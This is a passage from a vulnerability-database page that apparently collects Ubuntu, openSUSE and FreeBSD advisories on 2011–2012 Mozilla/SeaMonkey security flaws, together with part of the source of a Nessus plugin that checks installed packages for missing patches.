ID SUSE_11_3_SEAMONKEY-111221.NASL Type nessus Reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
seamonkey version 2.6 fixes several security issues :
{"ubuntu": [{"lastseen": "2020-07-09T00:33:20", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "USN-1306-1 fixed vulnerabilities in Firefox. This update provides updated \nMozvoikko and ubufox packages for use with Firefox 9.\n\nOriginal advisory details:\n\nAlexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler, \nDavid Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia \nKnous, and Rober Longson discovered several memory safety issues which \ncould possibly be exploited to crash Firefox or execute arbitrary code as \nthe user that invoked Firefox. (CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library that \ncould be triggered by javascript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could \nresult in an out-of-bounds memory access if SVG elements were removed \nduring a DOMAttrModified event handler. An attacker could potentially \nexploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation accessKey \nevents to detect key strokes even when JavaScript was disabled. A malicious \nweb page could potentially exploit this to trick a user into interacting \nwith a prompt thinking it came from the browser in a context where the user \nbelieved scripting was disabled. (CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when scaling an OGG \nelement to extreme sizes. (CVE-2011-3665)", "edition": 5, "modified": "2012-01-06T00:00:00", "published": "2012-01-06T00:00:00", "id": "USN-1306-2", "href": "https://ubuntu.com/security/notices/USN-1306-2", "title": "Mozvoikko and ubufox update", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:21:07", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler, \nDavid Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia \nKnous, and Rober Longson discovered several memory safety issues which \ncould possibly be exploited to crash Thunderbird or execute arbitrary code \nas the user that invoked Thunderbird. (CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library that \ncould be triggered by javascript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could \nresult in an out-of-bounds memory access if SVG elements were removed \nduring a DOMAttrModified event handler. An attacker could potentially \nexploit this vulnerability to crash Thunderbird. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation accessKey \nevents to detect key strokes even when JavaScript was disabled. A malicious \nweb page could potentially exploit this to trick a user into interacting \nwith a prompt thinking it came from Thunderbird in a context where the user \nbelieved scripting was disabled. (CVE-2011-3663)\n\nIt was discovered that it was possible to crash Thunderbird when scaling an \nOGG element to extreme sizes. (CVE-2011-3665)", "edition": 5, "modified": "2012-01-24T00:00:00", "published": "2012-01-24T00:00:00", "id": "USN-1343-1", "href": "https://ubuntu.com/security/notices/USN-1343-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:30:57", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler, \nDavid Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia \nKnous, and Rober Longson discovered several memory safety issues which \ncould possibly be exploited to crash Firefox or execute arbitrary code as \nthe user that invoked Firefox. (CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library that \ncould be triggered by javascript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could \nresult in an out-of-bounds memory access if SVG elements were removed \nduring a DOMAttrModified event handler. An attacker could potentially \nexploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation accessKey \nevents to detect key strokes even when JavaScript was disabled. A malicious \nweb page could potentially exploit this to trick a user into interacting \nwith a prompt thinking it came from the browser in a context where the user \nbelieved scripting was disabled. (CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when scaling an OGG\n\nelement to extreme sizes. (CVE-2011-3665)", "edition": 5, "modified": "2012-01-06T00:00:00", "published": "2012-01-06T00:00:00", "id": "USN-1306-1", "href": "https://ubuntu.com/security/notices/USN-1306-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:20:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0457", "CVE-2012-0456", "CVE-2012-0461", "CVE-2012-0464", "CVE-2012-0455", "CVE-2011-3658", "CVE-2012-0458"], "description": "It was discovered that a flaw in the Mozilla SVG implementation could \nresult in an out-of-bounds memory access if SVG elements were removed \nduring a DOMAttrModified event handler. If the user were tricked into \nopening a specially crafted page, an attacker could exploit this to cause a \ndenial of service via application crash. (CVE-2011-3658)\n\nAtte Kettunen discovered a use-after-free vulnerability in the Gecko \nRendering Engine's handling of SVG animations. An attacker could \npotentially exploit this to execute arbitrary code with the privileges of \nthe user invoking the Xulrunner based application. (CVE-2012-0457)\n\nAtte Kettunen discovered an out of bounds read vulnerability in the Gecko \nRendering Engine's handling of SVG Filters. An attacker could potentially \nexploit this to make data from the user's memory accessible to the page \ncontent. (CVE-2012-0456)\n\nSoroush Dalili discovered that the Gecko Rendering Engine did not \nadequately protect against dropping JavaScript links onto a frame. A remote \nattacker could, through cross-site scripting (XSS), exploit this to modify \nthe contents of the frame or steal confidential data. (CVE-2012-0455)\n\nMariusz Mlynski discovered that the Home button accepted JavaScript links \nto set the browser Home page. An attacker could use this vulnerability to \nget the script URL loaded in the privileged about:sessionrestore context. \n(CVE-2012-0458)\n\nBob Clary, Vincenzo Iozzo, and Willem Pinckaers discovered memory safety \nissues affecting Firefox. If the user were tricked into opening a specially \ncrafted page, an attacker could exploit these to cause a denial of service \nvia application crash, or potentially execute code with the privileges of \nthe user invoking Firefox. (CVE-2012-0461, CVE-2012-0464)", "edition": 5, "modified": "2012-03-19T00:00:00", "published": "2012-03-19T00:00:00", "id": "USN-1401-1", "href": "https://ubuntu.com/security/notices/USN-1401-1", "title": "Xulrunner vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0457", "CVE-2012-0456", "CVE-2012-0461", "CVE-2012-0464", "CVE-2012-0455", "CVE-2011-3658", "CVE-2012-0458"], "description": "USN-1401-1 fixed vulnerabilities in Xulrunner. This update provides the \ncorresponding fixes for Thunderbird.\n\nOriginal advisory details:\n\nIt was discovered that a flaw in the Mozilla SVG implementation could \nresult in an out-of-bounds memory access if SVG elements were removed \nduring a DOMAttrModified event handler. If the user were tricked into \nopening a specially crafted page, an attacker could exploit this to cause a \ndenial of service via application crash. (CVE-2011-3658)\n\nAtte Kettunen discovered a use-after-free vulnerability in the Gecko \nRendering Engine's handling of SVG animations. An attacker could \npotentially exploit this to execute arbitrary code with the privileges of \nthe user invoking the Xulrunner based application. (CVE-2012-0457)\n\nAtte Kettunen discovered an out of bounds read vulnerability in the Gecko \nRendering Engine's handling of SVG Filters. An attacker could potentially \nexploit this to make data from the user's memory accessible to the page \ncontent. (CVE-2012-0456)\n\nSoroush Dalili discovered that the Gecko Rendering Engine did not \nadequately protect against dropping JavaScript links onto a frame. A remote \nattacker could, through cross-site scripting (XSS), exploit this to modify \nthe contents of the frame or steal confidential data. (CVE-2012-0455)\n\nMariusz Mlynski discovered that the Home button accepted JavaScript links \nto set the browser Home page. An attacker could use this vulnerability to \nget the script URL loaded in the privileged about:sessionrestore context. \n(CVE-2012-0458)\n\nBob Clary, Vincenzo Iozzo, and Willem Pinckaers discovered memory safety \nissues affecting Firefox. If the user were tricked into opening a specially \ncrafted page, an attacker could exploit these to cause a denial of service \nvia application crash, or potentially execute code with the privileges of \nthe user invoking Firefox. (CVE-2012-0461, CVE-2012-0464)", "edition": 5, "modified": "2012-03-23T00:00:00", "published": "2012-03-23T00:00:00", "id": "USN-1401-2", "href": "https://ubuntu.com/security/notices/USN-1401-2", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Mozilla Firefox Version 9 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash\n in the YARR regular expression library\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n * MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n * MFSA 2011-58/CVE-2011-3665: Crash scaling <video> to\n extreme sizes\n\n", "edition": 1, "modified": "2012-02-09T19:09:53", "published": "2012-02-09T19:09:53", "id": "OPENSUSE-SU-2012:0039-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00005.html", "title": "MozillaFirefox (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "seamonkey version 2.6 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash\n in the YARR regular expression library\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n * MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n * MFSA 2011-58/CVE-2011-3665: Crash scaling <video> to\n extreme sizes\n\n", "edition": 1, "modified": "2012-01-05T12:08:18", "published": "2012-01-05T12:08:18", "id": "OPENSUSE-SU-2012:0007-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00025.html", "title": "seamonkey (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "seamonkey version 2.6 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash\n in the YARR regular expression library\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n * MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n * MFSA 2011-58/CVE-2011-3665: Crash scaling <video> to\n extreme sizes\n\n", "edition": 1, "modified": "2012-01-05T12:35:43", "published": "2012-01-05T12:35:43", "id": "OPENSUSE-SU-2012:0039-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00033.html", "type": "suse", "title": "seamonkey (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:21:58", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2014-1505", "CVE-2014-1536", "CVE-2011-0061", "CVE-2011-0077", "CVE-2014-1513", "CVE-2012-0478", "CVE-2012-4193", "CVE-2012-0442", "CVE-2013-5601", "CVE-2013-1687", "CVE-2013-5612", "CVE-2013-1692", "CVE-2010-0654", "CVE-2012-1962", "CVE-2013-0743", "CVE-2012-0443", "CVE-2012-5842", "CVE-2012-4212", "CVE-2013-5595", "CVE-2010-0176", "CVE-2014-1530", "CVE-2011-0083", "CVE-2010-1203", "CVE-2013-1737", "CVE-2012-4214", "CVE-2008-1236", "CVE-2013-5611", "CVE-2012-1970", "CVE-2008-3835", "CVE-2013-1709", "CVE-2007-3738", "CVE-2012-3989", "CVE-2013-5616", "CVE-2013-1678", "CVE-2010-2762", "CVE-2012-5830", "CVE-2013-0763", "CVE-2014-1510", "CVE-2011-3026", "CVE-2012-0460", "CVE-2013-5613", "CVE-2012-1973", "CVE-2014-1522", "CVE-2011-3654", "CVE-2014-1567", "CVE-2012-1974", "CVE-2010-2766", "CVE-2012-4195", "CVE-2012-3986", "CVE-2013-0783", "CVE-2007-3734", "CVE-2011-2371", "CVE-2014-1481", "CVE-2013-1670", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2013-1719", "CVE-2012-3968", "CVE-2013-1725", "CVE-2012-3963", "CVE-2014-1539", "CVE-2010-0174", "CVE-2012-0452", "CVE-2013-1735", "CVE-2012-1956", "CVE-2014-1487", "CVE-2012-3978", "CVE-2012-3985", "CVE-2013-0746", "CVE-2012-5829", "CVE-2009-1571", "CVE-2012-1944", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2014-1538", "CVE-2012-4213", "CVE-2013-1685", "CVE-2012-0479", "CVE-2013-5609", "CVE-2007-3737", "CVE-2013-0766", "CVE-2007-3736", "CVE-2012-1940", "CVE-2013-1697", "CVE-2014-1484", "CVE-2014-1525", "CVE-2012-3993", "CVE-2013-5619", "CVE-2012-5837", "CVE-2008-5500", "CVE-2012-5836", "CVE-2014-1509", "CVE-2009-0772", "CVE-2013-0787", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2014-1494", "CVE-2014-1559", "CVE-2013-0747", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2014-1537", "CVE-2013-1694", "CVE-2014-1523", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2013-5615", "CVE-2013-1680", "CVE-2012-3962", "CVE-2012-0459", "CVE-2011-2362", "CVE-2014-1529", "CVE-2013-1724", "CVE-2010-1213", "CVE-2013-5597", "CVE-2012-5843", "CVE-2014-1543", "CVE-2014-1486", "CVE-2011-0085", "CVE-2013-5590", "CVE-2008-5510", "CVE-2011-0080", "CVE-2013-0780", "CVE-2008-5502", "CVE-2010-3765", "CVE-2013-1732", "CVE-2013-0744", "CVE-2013-0795", "CVE-2008-1237", "CVE-2013-1720", "CVE-2008-4070", "CVE-2013-0748", "CVE-2012-4183", "CVE-2010-3178", "CVE-2013-1679", "CVE-2007-3285", "CVE-2013-5610", "CVE-2013-0768", "CVE-2011-3661", "CVE-2012-4181", "CVE-2014-1532", "CVE-2013-6671", "CVE-2009-0040", "CVE-2011-3652", "CVE-2013-0755", "CVE-2008-4067", "CVE-2014-1548", "CVE-2011-2364", "CVE-2014-1531", "CVE-2013-0752", "CVE-2012-4186", "CVE-2014-1508", "CVE-2012-1948", "CVE-2008-5012", "CVE-2012-1938", "CVE-2013-0796", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2014-1502", "CVE-2013-1723", "CVE-2013-0782", "CVE-2012-1953", "CVE-2012-1949", "CVE-2014-1542", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3169", "CVE-2012-3970", "CVE-2011-0053", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2010-3768", "CVE-2014-1477", "CVE-2013-0800", "CVE-2010-1212", "CVE-2013-1681", "CVE-2010-1211", "CVE-2010-1121", "CVE-2013-0773", "CVE-2013-0754", "CVE-2010-3167", "CVE-2012-4202", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2014-1540", "CVE-2014-1534", "CVE-2012-1941", "CVE-2013-1738", "CVE-2014-1482", "CVE-2014-1479", "CVE-2008-4066", "CVE-2008-5018", "CVE-2012-3984", "CVE-2014-1504", "CVE-2012-0444", "CVE-2011-3650", "CVE-2014-1511", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2012-4182", "CVE-2008-1233", "CVE-2012-4187", "CVE-2012-3983", "CVE-2011-0062", "CVE-2008-0016", "CVE-2011-3101", "CVE-2010-3168", "CVE-2013-0788", "CVE-2013-1728", "CVE-2014-1545", "CVE-2010-0173", "CVE-2012-0472", "CVE-2013-5592", "CVE-2013-1730", "CVE-2008-4059", "CVE-2010-2764", "CVE-2014-1492", "CVE-2011-0081", "CVE-2009-0771", "CVE-2007-3670", "CVE-2012-1954", "CVE-2009-0774", "CVE-2014-1556", "CVE-2012-0461", "CVE-2011-2376", "CVE-2012-3958", "CVE-2012-0469", "CVE-2014-1563", "CVE-2014-1524", "CVE-2014-1512", "CVE-2012-1975", "CVE-2011-0075", "CVE-2013-1690", "CVE-2012-0464", "CVE-2013-0775", "CVE-2012-1967", "CVE-2013-5604", "CVE-2014-1514", "CVE-2010-3166", "CVE-2011-0074", "CVE-2013-0801", "CVE-2012-3956", "CVE-2010-2769", "CVE-2012-3982", "CVE-2009-3555", "CVE-2013-1714", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-5021", "CVE-2008-5017", "CVE-2013-0769", "CVE-2012-3966", "CVE-2013-0771", "CVE-2014-1490", "CVE-2012-5839", "CVE-2013-0757", "CVE-2014-1498", "CVE-2012-1961", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2014-1565", "CVE-2012-3967", "CVE-2013-0749", "CVE-2011-3651", "CVE-2008-4060", "CVE-2007-3656", "CVE-2008-1234", "CVE-2012-1951", "CVE-2012-0475", "CVE-2014-1555", "CVE-2014-1564", "CVE-2012-1952", "CVE-2010-1201", "CVE-2013-0761", "CVE-2013-1669", "CVE-2010-1585", "CVE-2012-3959", "CVE-2012-0455", "CVE-2014-1558", "CVE-2011-0084", "CVE-2012-0759", "CVE-2007-3089", "CVE-2014-1519", "CVE-2013-1701", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2013-1684", "CVE-2008-4058", "CVE-2012-4184", "CVE-2012-0447", "CVE-2014-1547", "CVE-2011-3232", "CVE-2012-4205", "CVE-2014-1480", "CVE-2014-1500", "CVE-2011-0069", "CVE-2013-6630", "CVE-2008-5022", "CVE-2008-5512", "CVE-2014-1497", "CVE-2013-5596", "CVE-2012-3992", "CVE-2008-1235", "CVE-2013-1676", "CVE-2013-0789", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2013-1675", "CVE-2014-1478", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2012-1960", "CVE-2012-0445", "CVE-2012-0462", "CVE-2012-4217", "CVE-2013-1686", "CVE-2013-0745", "CVE-2013-0756", "CVE-2012-4218", "CVE-2013-0760", "CVE-2011-2377", "CVE-2014-1485", "CVE-2014-1493", "CVE-2007-3735", "CVE-2011-3000", "CVE-2010-2765", "CVE-2014-1544", "CVE-2010-2767", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2013-0767", "CVE-2010-3182", "CVE-2009-0776", "CVE-2013-5603", "CVE-2012-1959", "CVE-2011-2363", "CVE-2011-0070", "CVE-2013-1682", "CVE-2012-1947", "CVE-2013-6673", "CVE-2013-1674", "CVE-2013-0762", "CVE-2014-1562", "CVE-2010-3170", "CVE-2011-3005", "CVE-2012-4208", "CVE-2011-3658", "CVE-2014-1541", "CVE-2011-2373", "CVE-2008-5511", "CVE-2011-2992", "CVE-2014-1488", "CVE-2012-1957", "CVE-2012-1958", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2014-1552", "CVE-2010-3183", "CVE-2010-1202", "CVE-2012-0468", "CVE-2013-5599", "CVE-2014-1553", "CVE-2014-1549", "CVE-2013-1713", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2008-4061", "CVE-2013-5591", "CVE-2010-1199", "CVE-2012-4204", "CVE-2013-5602", "CVE-2011-2985", "CVE-2012-4192", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2013-0774", "CVE-2008-5024", "CVE-2013-0753", "CVE-2012-5833", "CVE-2014-1557", "CVE-2013-1736", "CVE-2014-1526", "CVE-2013-0776", "CVE-2012-3964", "CVE-2013-5593", "CVE-2014-1550", "CVE-2013-1718", "CVE-2012-5841", "CVE-2014-1533", "CVE-2013-1717", "CVE-2010-2754", "CVE-2008-5507", "CVE-2012-3990", "CVE-2014-1491", "CVE-2013-6672", "CVE-2013-5614", "CVE-2008-4065", "CVE-2013-1693", "CVE-2010-2760", "CVE-2013-0750", "CVE-2012-1937", "CVE-2014-1560", "CVE-2012-4215", "CVE-2013-6629", "CVE-2012-0463", "CVE-2013-1677", "CVE-2011-2991", "CVE-2013-0770", "CVE-2013-0793", "CVE-2012-4179", "CVE-2011-3001", "CVE-2014-1483", "CVE-2014-1489", "CVE-2011-3062", "CVE-2012-0477", "CVE-2013-1722", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2013-1710", "CVE-2012-0467", "CVE-2012-0458", "CVE-2013-0758", "CVE-2013-5600", "CVE-2010-2752", "CVE-2014-1499", "CVE-2014-1518", "CVE-2012-0471", "CVE-2012-3961", "CVE-2014-1561", "CVE-2012-3971", "CVE-2013-0764", "CVE-2014-1528", "CVE-2013-5618", "CVE-2011-0072"], "description": "This patch contains security updates for\n\n * mozilla-nss 3.16.4\n - The following 1024-bit root CA certificate was restored to allow more\n time to develop a better transition strategy for affected sites. It\n was removed in NSS 3.16.3, but discussion in the\n mozilla.dev.security.policy forum led to the decision to keep this\n root included longer in order to give website administrators more time\n to update their web servers.\n - CN = GTE CyberTrust Global Root\n * In NSS 3.16.3, the 1024-bit "Entrust.net Secure Server Certification\n Authority" root CA certificate was removed. In NSS 3.16.4, a 2048-bit\n intermediate CA certificate has been included, without explicit trust.\n The intention is to mitigate the effects of the previous removal of\n the 1024-bit Entrust.net root certificate, because many public\n Internet sites still use the "USERTrust Legacy Secure Server CA"\n intermediate certificate that is signed by the 1024-bit Entrust.net\n root certificate. The inclusion of the intermediate certificate is a\n temporary measure to allow those sites to function, by allowing them\n to find a trust path to another 2048-bit root CA certificate. The\n temporarily included intermediate certificate expires November 1, 2015.\n\n * Firefox 31.1esr Firefox is updated from 24esr to 31esr as maintenance\n for version 24 stopped\n\n", "edition": 1, "modified": "2014-09-09T18:04:16", "published": "2014-09-09T18:04:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00004.html", "id": "OPENSUSE-SU-2014:1100-1", "title": "Firefox update to 31.1esr (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "\nThe Mozilla Project reports:\n\nMFSA 2011-53 Miscellaneous memory safety hazards (rv:9.0)\nMFSA 2011-54 Potentially exploitable crash in the YARR regular\n\t expression library\nMFSA 2011-55 nsSVGValue out-of-bounds access\nMFSA 2011-56 Key detection without JavaScript via SVG\n\t animation\nMFSA 2011-58 Crash scaling video to extreme sizes\n\n", "edition": 4, "modified": "2011-12-21T00:00:00", "published": "2011-12-20T00:00:00", "id": "E3FF776B-2BA6-11E1-93C6-0011856A6E37", "href": "https://vuxml.freebsd.org/freebsd/e3ff776b-2ba6-11e1-93c6-0011856a6e37.html", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T06:37:15", "description": "USN-1306-1 fixed vulnerabilities in Firefox. This update provides\nupdated Mozvoikko and ubufox packages for use with Firefox 9.\n\nAlexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Firefox or\nexecute arbitrary code as the user that invoked Firefox.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression\nlibrary that could be triggered by JavaScript in web\ncontent. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG\nimplementation could result in an out-of-bounds memory\naccess if SVG elements were removed during a DOMAttrModified\nevent handler. An attacker could potentially exploit this\nvulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG\nanimation accessKey events to detect key strokes even when\nJavaScript was disabled. A malicious web page could\npotentially exploit this to trick a user into interacting\nwith a prompt thinking it came from the browser in a context\nwhere the user believed scripting was disabled.\n(CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when\nscaling an OGG <video> element to extreme sizes.\n(CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2012-01-09T00:00:00", "title": "Ubuntu 11.04 / 11.10 : mozvoikko, ubufox update (USN-1306-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:11.04", "p-cpe:/a:canonical:ubuntu_linux:xul-ext-ubufox", "p-cpe:/a:canonical:ubuntu_linux:xul-ext-mozvoikko"], "id": "UBUNTU_USN-1306-2.NASL", "href": "https://www.tenable.com/plugins/nessus/57458", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1306-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57458);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_bugtraq_id(51133, 51134, 51135, 51136, 51138);\n script_xref(name:\"USN\", value:\"1306-2\");\n\n script_name(english:\"Ubuntu 11.04 / 11.10 : mozvoikko, ubufox update (USN-1306-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-1306-1 fixed vulnerabilities in Firefox. This update provides\nupdated Mozvoikko and ubufox packages for use with Firefox 9.\n\nAlexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Firefox or\nexecute arbitrary code as the user that invoked Firefox.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression\nlibrary that could be triggered by JavaScript in web\ncontent. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG\nimplementation could result in an out-of-bounds memory\naccess if SVG elements were removed during a DOMAttrModified\nevent handler. An attacker could potentially exploit this\nvulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG\nanimation accessKey events to detect key strokes even when\nJavaScript was disabled. A malicious web page could\npotentially exploit this to trick a user into interacting\nwith a prompt thinking it came from the browser in a context\nwhere the user believed scripting was disabled.\n(CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when\nscaling an OGG <video> element to extreme sizes.\n(CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1306-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected xul-ext-mozvoikko and / or xul-ext-ubufox\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 